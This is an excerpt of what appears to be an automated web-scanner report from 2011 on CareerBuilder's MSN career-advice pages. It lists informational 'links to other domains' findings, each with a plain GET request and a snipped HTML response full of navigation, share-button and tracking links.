...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home"><strong>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.redacted/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li><li><a href="http://realestate.redacted/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo">
<a href="http://www.bing.com/search?FORM=AP">Bing</a>
...[SNIP]...
<li class="first">
<a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg">
<a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last">
<a href="http://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=10&amp;ct=1178121103&amp;rver=4.0.1532.0&amp;wp=LBI&amp;wreply=http:%2F%2Fcareers.redacted%2F&amp;lc=1033&amp;id=74314">Sign in</a>
...[SNIP]...
<div id="logo">
<a href="http://www.redacted">
<img id="msnlogo" src="http://blstc.redacted/br/gbl/lg/1/t/msft.png" title="go to redacted" alt="go to redacted" />
</a>
...[SNIP]...
<div>
<a href="http://www.bing.com/search" id="wslink1">Search the web</a>
...[SNIP]...
<div id="optlinks" class="link">
<a href="http://msn.empleoscb.com/">Espa..ol</a>
...[SNIP]...
<strong>
<a href="http://careers.msn.com">Careers</a>
</strong>
<a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div id="partnerlogo" style="padding: 15px 0 10px 10px; font-family: Tahoma, Arial, Sans-Serif; color:#006699;">
           
            <img src="https://secure.icbdr.com/images/custom/msn/wcareerbuilder-com.gif" id="Img1" alt="CareerBuilder.com" />
            <div id="partnerlinks" style="padding: 10px 0 5px 0;">
...[SNIP]...
<li class="first"><a href="http://careers.msn.com/">Home</a>
...[SNIP]...
<li><a id="Cbhyperlink6" href="http://www.cbsalary.com/calculators.aspx?lr=cbmsn&amp;siteid=cbmsn_3calc" target="_blank">Salary Calculators</a>
...[SNIP]...
<li><a id="Cbhyperlink19" href="http://careerpath.com/career-tests/?lr=cbmsn&amp;siteid=cbmsnchcpath" target="_blank">Career Tests</a>
...[SNIP]...
</select>
                                <img src="http://img.icbdr.com/images/pixel.gif" id="qsbNEW_Img1" width="1" hspace="1" height="10" />
                            </td>
...[SNIP]...
</em><a href="http://www.rhi.com/"><em>
...[SNIP]...
<li><a href="http://www.stumbleupon.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js&title=Excuse-Free Time Off"> <img border=0 src="http://www.stumbleupon.com/images/icon_su.gif" alt="StumbleUpon"> Stumble It!</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js&t=Excuse-Free Time Off"> <img border=0 src="http://static.ak.fbcdn.net/images/share/facebook_share_icon.gif" alt="Facebook"> Facebook</a>
...[SNIP]...
<li><a href="http://del.icio.us/post?noui&v=4&jump=close&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js&title=Excuse-Free Time Off"> <img border=0 src="http://images.del.icio.us/static/img/delicious.small.gif" alt="del.icio.us"> del.icio.us</a>
...[SNIP]...
<li><a href="http://spaces.live.com/BlogIt.aspx?Title=Excuse-Free Time Off&SourceURL=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js"> <img border=0 src="http://sc2.sclive.net/00.0.0000.0000/Web/images/spacesicon16.gif" alt="Live Spaces"> Live Spaces</a>
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js&title=Excuse-Free Time Off"> <img border=0 src="http://digg.com/img/digg-it-tiny-submit.gif" alt="Digg"> Digg It!</a>
...[SNIP]...
<li><a href="http://reddit.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js&title=Excuse-Free Time Off"> <img border=0 src="http://sp.reddit.com/reddithead4.gif" alt="Reddit"> reddit</a>
...[SNIP]...
<div style="float: left; height: 30px; line-height: 30px;">
        <img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_print_icon.gif" border="0" style="margin-top: 2px;" /><a id="hlPrinterLinkNEW" onclick="javascript:window.open('/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&amp;sc_extcmp=JS_1302_jobmod&amp;pf=true', 'printerfriendly', 'wid
...[SNIP]...
<a href="mailto:?body=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js"><img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_email_icon.gif" border="0" /> E-mail</a>
...[SNIP]...
<div style="float: left; height: 30px; line-height: 30px; margin-top: 4px !ie; _margin-top: 0;">
        <img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_discuss_icon.gif" border="0" style="float: left; margin-top: 5px;" />
        <a onClick="popupDiscuss();" style="cursor: pointer;">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5ODE5NTI3MjNkZH92Tm4x0BRcNLkPDvNpw+PPA2mW" />

   
<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js" type="text/javascript"></script>
...[SNIP]...
</center>
<iframe scrolling="no" width="300" height="250" marginheight="0" marginwidth="0" frameborder="0" framespacing="0" src="http://rad.redacted/ADSAdClient31.dll?GetAd?PG=CCHAPR?PS=45019?PI=7327?NC=1154?AP=1417?SC=D1"></iframe>
...[SNIP]...
<li><a href="http://realestate.redacted/article.aspx?cp-documentid=27225933">America's best places to raise kids</a>
...[SNIP]...
<li><a href="http://money.msn.com/auto-insurance/7-ways-to-overpay-for-car-insurance-insure.aspx">7 ways to overpay for car insurance</a>
...[SNIP]...
<li><a href="http://www.delish.com/food-fun/best-burgers">The 25 best burgers in the U.S.</a>
...[SNIP]...
<li><a href="http://health.msn.com/health-topics/quit-smoking/slideshow.aspx?cp-documentid=100268836">Top 5 habits that harm your heart</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26466635">A decade of game-changing fashion moments</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=valentine%27s+day+gift+ideas&amp;form=ap">Bing: Valentine's day gift ideas</a>
...[SNIP]...
<li><a href="http://editorial.autos.redacted/listarticle.aspx?cp-documentid=1176914">10 safe and reliable cars for teens</a>
...[SNIP]...
<li class="first">
<a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li>
<a href="http://g.redacted/0TO_/enus">Legal</a>
</li>
<li>
<a href="http://advertising.redacted/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last">
<a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<li class="last">
<a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
<!-- End comScore Tag -->

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...
<noscript><img src = "http://msnportalcareers.112.2O7.net/b/ss/msnportalcareers/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.232. http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains (see the response below).

Request

GET /Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&sc_extcmp=JS_1391_jobmod HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60961
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=674c5ead2af04f018f7a06a3d6249272-349642137-wm-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C8421247E30C7ABBCDCC0B40EE50661089478D9F1B0457BD5D042FFB1FA0100B1D0E1E74E64E4F642BE1; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:56 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR23
Date: Sat, 29 Jan 2011 23:48:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   MSN Ca
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/cbglobal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msncareeradvice.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msn_full.css" /><script type="text/javascript">
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...
<!--[if !IE]>-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id="reporting">
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&amp;pi=7327&amp;ps=45019&amp;tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&amp;rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<li class="c1"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="first"><a href="http://www.msnbc.redacted/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032619/ns/nightly_news/">NBC Nightly News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032553/ns/politics">Politics</a></li><li><a href="http://www.msnbc.redacted/id/3032118/ns/technology_and_science">Tech &amp; Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.redacted/">Today Show</a></li><li><a href="http://www.msnbc.redacted/id/3032525/ns/us_news">US News</a></li><li><a href="http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp">Video</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.msnbc.redacted/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/"><strong>
...[SNIP]...
<li><a href="http://thebubble.redacted/ ">Comedy</a></li><li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.redacted/"> TV</a></li><li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb"> MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li class="c4"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote"><strong>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate &amp; Rentals</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c5"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty &amp; Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-home/">Decor &amp; Organizing</a>
...[SNIP]...
<li><a href="http://glo.redacted/">Glo: For Her</a>
...[SNIP]...
<li><a href="http://health.msn.com/">Health, Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li><a href="http://lifestyle.redacted/relationships/">Love &amp; Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c6 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home"><strong>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.redacted/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li><li><a href="http://realestate.redacted/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo">
<a href="http://www.bing.com/search?FORM=AP">Bing</a>
...[SNIP]...
<li class="first">
<a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg">
<a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last">
<a href="http://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=10&amp;ct=1178121103&amp;rver=4.0.1532.0&amp;wp=LBI&amp;wreply=http:%2F%2Fcareers.redacted%2F&amp;lc=1033&amp;id=74314">Sign in</a>
...[SNIP]...
<div id="logo">
<a href="http://www.redacted">
<img id="msnlogo" src="http://blstc.redacted/br/gbl/lg/1/t/msft.png" title="go to redacted" alt="go to redacted" />
</a>
...[SNIP]...
<div>
<a href="http://www.bing.com/search" id="wslink1">Search the web</a>
...[SNIP]...
<div id="optlinks" class="link">
<a href="http://msn.empleoscb.com/">Español</a>
...[SNIP]...
<strong>
<a href="http://careers.msn.com">Careers</a>
</strong>
<a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div id="partnerlogo" style="padding: 15px 0 10px 10px; font-family: Tahoma, Arial, Sans-Serif; color:#006699;">
           
            <img src="https://secure.icbdr.com/images/custom/msn/wcareerbuilder-com.gif" id="Img1" alt="CareerBuilder.com" />
            <div id="partnerlinks" style="padding: 10px 0 5px 0;">
...[SNIP]...
<li class="first"><a href="http://careers.msn.com/">Home</a>
...[SNIP]...
<li><a id="Cbhyperlink6" href="http://www.cbsalary.com/calculators.aspx?lr=cbmsn&amp;siteid=cbmsn_3calc" target="_blank">Salary Calculators</a>
...[SNIP]...
<li><a id="Cbhyperlink19" href="http://careerpath.com/career-tests/?lr=cbmsn&amp;siteid=cbmsnchcpath" target="_blank">Career Tests</a>
...[SNIP]...
</select>
                                <img src="http://img.icbdr.com/images/pixel.gif" id="qsbNEW_Img1" width="1" hspace="1" height="10" />
                            </td>
...[SNIP]...
<li><a href="http://www.stumbleupon.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js&title=9 Questions You Should Ask Your Boss"> <img border=0 src="http://www.stumbleupon.com/images/icon_su.gif" alt="StumbleUpon"> Stumble It!</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js&t=9 Questions You Should Ask Your Boss"> <img border=0 src="http://static.ak.fbcdn.net/images/share/facebook_share_icon.gif" alt="Facebook"> Facebook</a>
...[SNIP]...
<li><a href="http://del.icio.us/post?noui&v=4&jump=close&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js&title=9 Questions You Should Ask Your Boss"> <img border=0 src="http://images.del.icio.us/static/img/delicious.small.gif" alt="del.icio.us"> del.icio.us</a>
...[SNIP]...
<li><a href="http://spaces.live.com/BlogIt.aspx?Title=9 Questions You Should Ask Your Boss&SourceURL=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js"> <img border=0 src="http://sc2.sclive.net/00.0.0000.0000/Web/images/spacesicon16.gif" alt="Live Spaces"> Live Spaces</a>
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js&title=9 Questions You Should Ask Your Boss"> <img border=0 src="http://digg.com/img/digg-it-tiny-submit.gif" alt="Digg"> Digg It!</a>
...[SNIP]...
<li><a href="http://reddit.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js&title=9 Questions You Should Ask Your Boss"> <img border=0 src="http://sp.reddit.com/reddithead4.gif" alt="Reddit"> reddit</a>
...[SNIP]...
<div style="float: left; height: 30px; line-height: 30px;">
        <img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_print_icon.gif" border="0" style="margin-top: 2px;" /><a id="hlPrinterLinkNEW" onclick="javascript:window.open('/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&amp;sc_extcmp=JS_1391_jobmod&amp;pf=true', 'pri
...[SNIP]...
<a href="mailto:?body=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js"><img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_email_icon.gif" border="0" /> E-mail</a>
...[SNIP]...
<div style="float: left; height: 30px; line-height: 30px; margin-top: 4px !ie; _margin-top: 0;">
        <img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_discuss_icon.gif" border="0" style="float: left; margin-top: 5px;" />
        <a onClick="popupDiscuss();" style="cursor: pointer;">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5ODE5NTI3MjNkZH92Tm4x0BRcNLkPDvNpw+PPA2mW" />

   
<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js" type="text/javascript"></script>
...[SNIP]...
</center>
<iframe scrolling="no" width="300" height="250" marginheight="0" marginwidth="0" frameborder="0" framespacing="0" src="http://rad.redacted/ADSAdClient31.dll?GetAd?PG=CCHAPR?PS=45019?PI=7327?NC=1154?AP=1417?SC=D1"></iframe>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26466635">A decade of game-changing fashion moments</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=valentine%27s+day+gift+ideas&amp;form=ap">Bing: Valentine's day gift ideas</a>
...[SNIP]...
<li><a href="http://editorial.autos.redacted/listarticle.aspx?cp-documentid=1176914">10 safe and reliable cars for teens</a>
...[SNIP]...
<li><a href="http://realestate.redacted/article.aspx?cp-documentid=27225933">America's best places to raise kids</a>
...[SNIP]...
<li><a href="http://money.msn.com/auto-insurance/7-ways-to-overpay-for-car-insurance-insure.aspx">7 ways to overpay for car insurance</a>
...[SNIP]...
<li><a href="http://www.delish.com/food-fun/best-burgers">The 25 best burgers in the U.S.</a>
...[SNIP]...
<li><a href="http://health.msn.com/health-topics/quit-smoking/slideshow.aspx?cp-documentid=100268836">Top 5 habits that harm your heart</a>
...[SNIP]...
<li class="first">
<a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li>
<a href="http://g.redacted/0TO_/enus">Legal</a>
</li>
<li>
<a href="http://advertising.redacted/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last">
<a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<li class="last">
<a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
<!-- End comScore Tag -->

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...
<noscript><img src = "http://msnportalcareers.112.2O7.net/b/ss/msnportalcareers/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.233. http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains (see the response below).

Request

GET /Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&sc_extcmp=JS_1951_jobmod HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61888
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=2d280062b9e04d5ba7e3d8a3d3f6d24f-349642128-w8-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C8429FCCFA0CD930B672A7C9FD0DEECE0619B86D02C8AA139D336E1CE3EEE6BF984359F29590997384E8; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:47 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR8
Date: Sat, 29 Jan 2011 23:48:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   MSN Ca
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/cbglobal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msncareeradvice.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msn_full.css" /><script type="text/javascript">
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...
<!--[if !IE]>-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id="reporting">
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&amp;pi=7327&amp;ps=45019&amp;tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&amp;rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<li class="c1"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="first"><a href="http://www.msnbc.redacted/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032619/ns/nightly_news/">NBC Nightly News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032553/ns/politics">Politics</a></li><li><a href="http://www.msnbc.redacted/id/3032118/ns/technology_and_science">Tech &amp; Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.redacted/">Today Show</a></li><li><a href="http://www.msnbc.redacted/id/3032525/ns/us_news">US News</a></li><li><a href="http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp">Video</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.msnbc.redacted/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/"><strong>
...[SNIP]...
